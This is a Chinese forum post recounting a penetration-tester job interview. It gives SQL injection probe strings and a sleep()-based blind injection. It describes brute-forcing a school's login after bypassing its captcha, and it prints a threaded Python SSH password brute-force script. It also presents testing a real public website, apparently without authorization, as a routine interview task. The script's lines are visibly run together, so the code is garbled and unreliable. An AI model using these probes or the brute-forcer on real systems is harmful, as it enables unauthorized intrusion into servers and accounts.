湖南 盛世翔安科技 渗透测试工程师面试分享

所面试的公司：湖南盛世翔安科技有限公司

薪资待遇：不便透露

所在城市：湖南

面试职位：渗透测试工程师

面试过程：（重新发布一遍，突然记起了一些细节）老板先是打电话给我，问我大致会哪些技能，然后大致的把掌控教的讲了下，然后一面考的比较简单，sql注入，xss，sql判断方法，二面叫我用python写爆破ssh的脚本，三面叫我找个公益网站写个渗透报告  

面试官的问题：

一面：

1、跟我讲下sql？

原理：1，用户可以控制输入 2，原本程序的被当做代码执行   分盲注等等   (当时很晚了，打电话过来，我一般7~9点在打游戏)

2、跟我讲讲xss？

xss是拼接了html，所以可以叫做html注入，跟sql原理差不多，不过我是回答：服务器对用户输入没有进行足够的过滤，导致了客户端（浏览器）在渲染服务器返回的html时，执行了预期之外的脚本语句

3、怎么判断sql注入？ 

and 1=1 and 1=2 和 单引号

4、关闭了单引号报错怎么办？

slepp（）进行盲注

5、你最得意的一次渗透测试？

对某学校进行一次渗透测试，用layer扫出子域名，然后找到了网关系统和统一身份证登陆，恰巧我信息收集到了一些有用的信息，然后发现可以绕验证码进行暴力破解

6、 看你漏洞盒子排名13，你id多少？

holicz（然后因为是电话面，说话也不注意点，听到电话那头有一个人不相信，然后说我谷歌语法挖的......，时候叫我发截图）

二面：

写个python脚本爆破ssh

from pexpect import pxssh
import argparse
import threading

maxConnetions = 5
connect_lock = threading.BoundedSemaphore(value=maxConnetions)

def connect(host, user, password):
    try:
        s = pxssh.pxssh()
        # 登录ssh测试
        s.login(host, user, password)
        print("[+] Password Found: {}".format(password))
    except pxssh.ExceptionPxssh as e:
        passdef main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-H', dest='Host', help="like: 192.168.3.1")
    parser.add_argument('-F', dest='passwdFile', help="like: /root/pass.txt")
    parser.add_argument('-u', dest='user')
    args = parser.parse_args()
    host = args.Host
    passwdFile = args.passwdFile
    user = args.user    with open(passwdFile, 'r') as f:
        for line in f.readlines():
            with connect_lock:
                password = line.strip('\n')
                print("[-] Testing: {}".format(password))
                t = threading.Thread(target=connect, args=(host, user, password))
                t.start()if __name__ == '__main__':
    main()

（贴上代码吧）

三面：找个渗透目标，写份渗透报告

于是我找了莆田小鱼网 然后他们的漏洞已经修复了，不过他们用的是cms

面试结果：通过

面试难度：中等（写脚本困惑到我了）

面试感受：还行，只要把正式课学透了就好

给大家的建议：（重新写了遍，一面的一部分给忘了，大体上是这些问题）建议大家在技术底层方面，原理上，多下功夫。有机会可以学习python 和php两本语言，会写poc，会写小工具 和会代码审计可以加分很多。另外面试官重点看的是简历上面会啥，所以简历上面写的一定要掌握。推荐本书（python编程 无师自通），学Python耗费了我一个月的时间